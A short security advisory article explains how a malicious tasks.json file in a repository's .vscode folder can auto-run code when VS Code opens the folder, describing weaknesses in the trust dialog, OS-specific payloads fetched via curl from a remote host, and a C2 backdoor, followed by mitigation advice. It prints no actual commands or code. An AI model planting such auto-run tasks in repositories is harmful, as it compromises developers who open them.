How Malicious tasks.json Can Auto‑Run Code in VS Code and How to Protect Yourself

Security researchers recently discovered a new code‑repository vulnerability where malicious code is embedded in a tasks.json file. When VS Code opens a folder containing this file, the task can be executed automatically.

tasks.json

lets developers integrate command‑line tools into the editor and optionally run them automatically when the folder is opened. The file lives in the hidden .vscode directory of a repository.

VS Code has two safeguards: the “Allow Automatic Tasks” setting (enabled by default) and the default “untrusted workspace” mode, which prevents tasks from running in untrusted folders and shows a warning dialog (“process needs to execute code”). However, the dialog highlights the “Continue” button, and a “Trust parent folder” option can cause new subfolders to be trusted automatically.

The reported case contains a backdoor that enables remote code execution, system fingerprinting, and persistent C2 communication. The attacker exploits the OS‑specific command feature of tasks.json to run different payloads on macOS, Windows and Linux. A malicious JavaScript payload is fetched via curl from a remote server.

The malicious repository was hosted on GitHub (now removed) and the JavaScript payload on Vercel, making it harder for GitHub security scanners to detect.

Mitigation recommendations include: thoroughly reviewing repository contents before marking them trusted, being cautious with third‑party code, and performing development in isolated or temporary environments such as containers. Using containers as the default workflow can limit the impact of executing untrusted code.